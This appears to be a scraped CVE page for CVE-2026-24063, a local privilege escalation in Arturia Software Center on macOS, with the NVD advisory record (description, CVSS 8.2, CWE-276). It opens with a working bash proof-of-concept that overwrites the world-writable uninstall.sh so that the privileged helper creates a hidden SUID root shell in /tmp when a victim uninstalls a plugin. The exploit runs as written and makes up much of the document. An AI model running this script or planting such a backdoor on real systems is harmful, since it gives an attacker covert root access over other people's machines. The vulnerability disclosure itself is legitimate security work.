CVE-2026-24063

#!/bin/bash # CVE-2026-24063 PoC - Arturia Software Center Privilege Escalation # Author: Security Researcher # This PoC demonstrates the vulnerability where uninstall.sh has 777 permissions # Step 1: Find the uninstall.sh script with world-writable permissions UNINSTALL_SCRIPT=$(find /Library -name "uninstall.sh" -perm -777 2>/dev/null | grep -i arturia | head -1) if [ -z "$UNINSTALL_SCRIPT" ]; then echo "[-] Target uninstall.sh not found or not writable" exit 1 fi echo "[+] Found vulnerable script: $UNINSTALL_SCRIPT" # Step 2: Backup original script cp "$UNINSTALL_SCRIPT" "${UNINSTALL_SCRIPT}.backup" # Step 3: Inject malicious payload - creates a SUID shell cat > "$UNINSTALL_SCRIPT" << 'EOF' #!/bin/bash # Modified by attacker - CVE-2026-24063 # This code will execute with root privileges when uninstall is triggered # Create a SUID shell for privilege escalation cp /bin/bash /tmp/.arturia_hidden_shell chmod 4755 /tmp/.arturia_hidden_shell # Restore original functionality if [ -f "${0}.backup" ]; then cp "${0}.backup" "${0}" fi EOF chmod +x "$UNINSTALL_SCRIPT" echo "[+] Malicious payload injected successfully" echo "[+] Waiting for victim to uninstall plugin via Arturia Software Center..." echo "[+] After uninstall, access root shell: /tmp/.arturia_hidden_shell -p"

{"cve": {"id": "CVE-2026-24063", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-03-18T16:16:26.527", "lastModified": "2026-03-19T13:25:00.570", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "When a plugin is installed using the Arturia Software Center (MacOS), it also installs an uninstall.sh bash script in a root owned path. This script is written to disk with the file permissions 777, meaning it is writable by any user. When uninstalling a plugin via the Arturia Software Center the Privileged Helper gets instructed to execute this script. When the bash script is manipulated by an attacker this scenario will lead to privilege escalation."}, {"lang": "es", "value": "Cuando se instala un plugin usando el Arturia Software Center (macOS), también instala un script bash uninstall.sh en una ruta propiedad de root. Este script se escribe en el disco con los permisos de archivo 777, lo que significa que es escribible por cualquier usuario. Al desinstalar un plugin a través del Arturia Software Center, el Privileged Helper recibe instrucciones para ejecutar este script. Cuando el script bash es manipulado por un atacante, este escenario conducirá a una escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://r.sec-consult.com/arturia", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf"}]}}